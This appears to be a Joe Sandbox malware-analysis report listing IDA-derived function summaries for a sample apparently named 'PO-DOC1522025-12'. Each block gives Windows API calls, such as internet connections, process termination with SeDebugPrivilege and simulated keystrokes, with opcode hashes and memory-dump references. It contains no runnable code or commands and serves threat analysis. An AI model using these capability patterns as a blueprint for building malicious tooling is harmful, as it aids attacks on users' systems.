                                                                                    • Instruction Fuzzy Hash: E01106BE688717BAFB052228DC06DE7379CCF17328F204116FB05A50D6EF75A8625A54
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0daef21090bf360aa3b7183bd71bc9ade8703c637bae1c342090b675022f9d58
                                                                                    • Instruction ID: 05cc89f691d2fcb97b238636a798cbd9b94a6df16d0b73f8a5a5783893242972
                                                                                    • Opcode Fuzzy Hash: 0daef21090bf360aa3b7183bd71bc9ade8703c637bae1c342090b675022f9d58
                                                                                    • Instruction Fuzzy Hash: 6CC1F374904249AFCB11DFA8D889BADBBB4BF1A310F148099F51CA7392CB708946CB61
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                                    • String ID:
                                                                                    • API String ID: 1282221369-0
                                                                                    • Opcode ID: cc198d2f23e4ac879480720cf3cc37887c2db0d4dc2522010a1730cbcdbf4d15
                                                                                    • Instruction ID: a00a7ad7d3ba88a793a7cf96643d917b90a825c9891993c7975e17a0305d5479
                                                                                    • Opcode Fuzzy Hash: cc198d2f23e4ac879480720cf3cc37887c2db0d4dc2522010a1730cbcdbf4d15
                                                                                    • Instruction Fuzzy Hash: 36614571904314AFDB25AFB4BC85AAE7BB5EF16720F04C16EF94CA7281DB319D418790
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 001D5186
                                                                                    • ShowWindow.USER32(?,00000000), ref: 001D51C7
                                                                                    • ShowWindow.USER32(?,00000005,?,00000000), ref: 001D51CD
                                                                                    • SetFocus.USER32(?,?,00000005,?,00000000), ref: 001D51D1
                                                                                      • Part of subcall function 001D6FBA: DeleteObject.GDI32(00000000), ref: 001D6FE6
                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 001D520D
                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 001D521A
                                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 001D524D
                                                                                    • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 001D5287
                                                                                    • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 001D5296
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                                    • String ID:
                                                                                    • API String ID: 3210457359-0
                                                                                    • Opcode ID: e1366c15eeb5148a457c29fbab1bd895bf053c457595429a8e50497b492eacf8
                                                                                    • Instruction ID: 891788b835e39e2215b7e5cc7ce40f863e150b41c662a13304e40385741cf9ab
                                                                                    • Opcode Fuzzy Hash: e1366c15eeb5148a457c29fbab1bd895bf053c457595429a8e50497b492eacf8
                                                                                    • Instruction Fuzzy Hash: 3951BE30A41A09FEEF249F24CC4ABD93B73EB15365F148113FA259A3E0C775A998DB41
                                                                                    APIs
                                                                                    • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00196890
                                                                                    • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 001968A9
                                                                                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 001968B9
                                                                                    • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 001968D1
                                                                                    • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 001968F2
                                                                                    • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00158874,00000000,00000000,00000000,000000FF,00000000), ref: 00196901
                                                                                    • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0019691E
                                                                                    • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00158874,00000000,00000000,00000000,000000FF,00000000), ref: 0019692D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                    • String ID:
                                                                                    • API String ID: 1268354404-0
                                                                                    • Opcode ID: 0d10eceb5c8b6a4178d652f233462258c4708926706952b171f5f87478e77773
                                                                                    • Instruction ID: fbc9b85f2b77a9ff98548e79db188d6cb32df6ba816921c6cffb70acd8c17047
                                                                                    • Opcode Fuzzy Hash: 0d10eceb5c8b6a4178d652f233462258c4708926706952b171f5f87478e77773
                                                                                    • Instruction Fuzzy Hash: 86519870600309EFDF24CF24CC55FAA7BB9EB58761F104519F962AB2A0DB70E990DB50
                                                                                    APIs
                                                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 001BC182
                                                                                    • GetLastError.KERNEL32 ref: 001BC195
                                                                                    • SetEvent.KERNEL32(?), ref: 001BC1A9
                                                                                      • Part of subcall function 001BC253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 001BC272
                                                                                      • Part of subcall function 001BC253: GetLastError.KERNEL32 ref: 001BC322
                                                                                      • Part of subcall function 001BC253: SetEvent.KERNEL32(?), ref: 001BC336
                                                                                      • Part of subcall function 001BC253: InternetCloseHandle.WININET(00000000), ref: 001BC341
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                                    • String ID:
                                                                                    • API String ID: 337547030-0
                                                                                    • Opcode ID: 5c144107d05387b8ce5aeb4f25d9084902bcc3fc2f96541063613e06b15e98e2
                                                                                    • Instruction ID: 231c6ae5adc7fd5b507fa48178b057fab04c572b88c1c32aae61e84b3770f417
                                                                                    • Opcode Fuzzy Hash: 5c144107d05387b8ce5aeb4f25d9084902bcc3fc2f96541063613e06b15e98e2
                                                                                    • Instruction Fuzzy Hash: 6E318D71202606EFDB219FA9DC44AA6BBF9FF58300B04481EF956C6A10D730E854DBE0
                                                                                    APIs
                                                                                      • Part of subcall function 001A3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 001A3A57
                                                                                      • Part of subcall function 001A3A3D: GetCurrentThreadId.KERNEL32 ref: 001A3A5E
                                                                                      • Part of subcall function 001A3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,001A25B3), ref: 001A3A65
                                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 001A25BD
                                                                                    • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 001A25DB
                                                                                    • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 001A25DF
                                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 001A25E9
                                                                                    • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 001A2601
                                                                                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 001A2605
                                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 001A260F
                                                                                    • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 001A2623
                                                                                    • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 001A2627
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                    • String ID:
                                                                                    • API String ID: 2014098862-0
                                                                                    • Opcode ID: e48cab23c121a5b004a82c2d001f600ba1b6ff0044f34abc038fb8946938277d
                                                                                    • Instruction ID: cc732c2c6aa210728c800c992bb64f3b7bccc98cc21e0a3e839b9c8ff411a810
                                                                                    • Opcode Fuzzy Hash: e48cab23c121a5b004a82c2d001f600ba1b6ff0044f34abc038fb8946938277d
                                                                                    • Instruction Fuzzy Hash: 8A01B530691320FBFF1067689C8AF993F59DB5AB11F100402F318AF1D1CAF15484CAA9
                                                                                    APIs
                                                                                    • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,001A1449,?,?,00000000), ref: 001A180C
                                                                                    • HeapAlloc.KERNEL32(00000000,?,001A1449,?,?,00000000), ref: 001A1813
                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,001A1449,?,?,00000000), ref: 001A1828
                                                                                    • GetCurrentProcess.KERNEL32(?,00000000,?,001A1449,?,?,00000000), ref: 001A1830
                                                                                    • DuplicateHandle.KERNEL32(00000000,?,001A1449,?,?,00000000), ref: 001A1833
                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,001A1449,?,?,00000000), ref: 001A1843
                                                                                    • GetCurrentProcess.KERNEL32(001A1449,00000000,?,001A1449,?,?,00000000), ref: 001A184B
                                                                                    • DuplicateHandle.KERNEL32(00000000,?,001A1449,?,?,00000000), ref: 001A184E
                                                                                    • CreateThread.KERNEL32(00000000,00000000,001A1874,00000000,00000000,00000000), ref: 001A1868
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                    • String ID:
                                                                                    • API String ID: 1957940570-0
                                                                                    • Opcode ID: a102f7843cb034abd52f2c94fc8eaa3a64209a55fd8df94ce8c0a5e90a33c936
                                                                                    • Instruction ID: bcb703f7ff77e81b98b3af35d2f63b76765e55c4ae92252ede2cdaefb348e30d
                                                                                    • Opcode Fuzzy Hash: a102f7843cb034abd52f2c94fc8eaa3a64209a55fd8df94ce8c0a5e90a33c936
                                                                                    • Instruction Fuzzy Hash: 9501BF75241315FFE710AB65DC4DF573B6CEB89B11F004411FA05DB591C6749840CB60
                                                                                    APIs
                                                                                      • Part of subcall function 001AD4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 001AD501
                                                                                      • Part of subcall function 001AD4DC: Process32FirstW.KERNEL32(00000000,?), ref: 001AD50F
                                                                                      • Part of subcall function 001AD4DC: CloseHandle.KERNEL32(00000000), ref: 001AD5DC
                                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 001CA16D
                                                                                    • GetLastError.KERNEL32 ref: 001CA180
                                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 001CA1B3
                                                                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 001CA268
                                                                                    • GetLastError.KERNEL32(00000000), ref: 001CA273
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 001CA2C4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                    • String ID: SeDebugPrivilege
                                                                                    • API String ID: 2533919879-2896544425
                                                                                    • Opcode ID: ddbe28237f6c3620381deb1498cf9aa600b11d6666a9970f17d0df8b2c2b127b
                                                                                    • Instruction ID: 02c349e57baf5d2d2c1c88db52865dd6255bc554da7b470cb33a4df988465677
                                                                                    • Opcode Fuzzy Hash: ddbe28237f6c3620381deb1498cf9aa600b11d6666a9970f17d0df8b2c2b127b
                                                                                    • Instruction Fuzzy Hash: DF619E70205252AFD721DF18C494F15BBE1AF6431CF58848CE4668BBA3C776EC49CB92
                                                                                    APIs
                                                                                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 001D3925
                                                                                    • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 001D393A
                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 001D3954
                                                                                    • _wcslen.LIBCMT ref: 001D3999
                                                                                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 001D39C6
                                                                                    • SendMessageW.USER32(?,00001061,?,0000000F), ref: 001D39F4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Window_wcslen
                                                                                    • String ID: SysListView32
                                                                                    • API String ID: 2147712094-78025650
                                                                                    • Opcode ID: 7040b339ec858eb8323bb222eefe301788d19d7bdbb9502214f44c36314c0fee
                                                                                    • Instruction ID: 5f69437ee4b4e6081dcf38767473fea8f2fff0dbc38fe2173ce54fe80bf5ceaf
                                                                                    • Opcode Fuzzy Hash: 7040b339ec858eb8323bb222eefe301788d19d7bdbb9502214f44c36314c0fee
                                                                                    • Instruction Fuzzy Hash: D741A271A00219ABEF219F64CC49BEA7BA9EF18354F100527F958E7281D771DA94CB90
                                                                                    APIs
                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 001ABCFD
                                                                                    • IsMenu.USER32(00000000), ref: 001ABD1D
                                                                                    • CreatePopupMenu.USER32 ref: 001ABD53
                                                                                    • GetMenuItemCount.USER32(00B858C8), ref: 001ABDA4
                                                                                    • InsertMenuItemW.USER32(00B858C8,?,00000001,00000030), ref: 001ABDCC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                    • String ID: 0$2
                                                                                    • API String ID: 93392585-3793063076
                                                                                    • Opcode ID: b1e79648c7be70c8b63a1c05f2679bcab68205bbe4a6228c4b39dc02639dcbce
                                                                                    • Instruction ID: cb5273f8a2aa4b9a7589011e38b4e4461055c0d0b93e30eb123f70750907a843
                                                                                    • Opcode Fuzzy Hash: b1e79648c7be70c8b63a1c05f2679bcab68205bbe4a6228c4b39dc02639dcbce
                                                                                    • Instruction Fuzzy Hash: 3851BF78A092859BDF11CFF8D8C4BAEBBF4BF56318F14421AE401DB292D7709940CB51
                                                                                    APIs
                                                                                    • LoadIconW.USER32(00000000,00007F03), ref: 001AC913
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: IconLoad
                                                                                    • String ID: blank$info$question$stop$warning
                                                                                    • API String ID: 2457776203-404129466
                                                                                    • Opcode ID: 1556e3aeb1a37c9baf2fa72bdff746e6f0ac5f266632de7210a30caace818248
                                                                                    • Instruction ID: 6a6380e8b250f3e671a16afee636bbca4e7daa0a911b93c96f67da83e82c6d42
                                                                                    • Opcode Fuzzy Hash: 1556e3aeb1a37c9baf2fa72bdff746e6f0ac5f266632de7210a30caace818248
                                                                                    • Instruction Fuzzy Hash: 2F11273A689307BAE7059B549C83DAB67DCDF27328B20402EF500A62C2E7A49E1052E5
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcslen$LocalTime
                                                                                    • String ID:
                                                                                    • API String ID: 952045576-0
                                                                                    • Opcode ID: 1cc5898ede9544b5b9d6159df3582d95f5ca60eb11679c3dde628dd05f4f6cea
                                                                                    • Instruction ID: 6c0e3d9ca05449db28eb89b14a1f02047c63e6054ec1e9bceaf91b8261e3ac96
                                                                                    • Opcode Fuzzy Hash: 1cc5898ede9544b5b9d6159df3582d95f5ca60eb11679c3dde628dd05f4f6cea
                                                                                    • Instruction Fuzzy Hash: 5F41D466D1021876DB11EBF4CC8A9CFB7A8AF56310F508466F518E3121FB34E265C3E5
                                                                                    APIs
                                                                                    • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0019682C,00000004,00000000,00000000), ref: 0015F953
                                                                                    • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,0019682C,00000004,00000000,00000000), ref: 0019F3D1
                                                                                    • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0019682C,00000004,00000000,00000000), ref: 0019F454
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: ShowWindow
                                                                                    • String ID:
                                                                                    • API String ID: 1268545403-0
                                                                                    • Opcode ID: 2b7960383591c662796030159bb268f97feac57a0bc618304f5deb646b89409f
                                                                                    • Instruction ID: 55248c08639c7932a70187f7ca5e8e30bda9427bce591ab47f46afb001f0fa8f
                                                                                    • Opcode Fuzzy Hash: 2b7960383591c662796030159bb268f97feac57a0bc618304f5deb646b89409f
                                                                                    • Instruction Fuzzy Hash: 2C415231605A40FECB388B3DC88876A7B91BB5631AF15443DF8679B560C771A4CBC751
                                                                                    APIs
                                                                                    • DeleteObject.GDI32(00000000), ref: 001D2D1B
                                                                                    • GetDC.USER32(00000000), ref: 001D2D23
                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 001D2D2E
                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 001D2D3A
                                                                                    • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 001D2D76
                                                                                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 001D2D87
                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,001D5A65,?,?,000000FF,00000000,?,000000FF,?), ref: 001D2DC2
                                                                                    • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 001D2DE1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                    • String ID:
                                                                                    • API String ID: 3864802216-0
                                                                                    • Opcode ID: 6ffb399079b4352ae0d7ba4c624829a2701e8db2bb8219eee24450a2a7bd5912
                                                                                    • Instruction ID: 8d3825b4b0876f8611d3b2c97a73a09ca374b300fc53517c1e14e3a7d78c48a2
                                                                                    • Opcode Fuzzy Hash: 6ffb399079b4352ae0d7ba4c624829a2701e8db2bb8219eee24450a2a7bd5912
                                                                                    • Instruction Fuzzy Hash: 95318E76202614BFEB118F54CC8AFEB3FADEF19715F044056FE089A291D6759C90CBA4
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
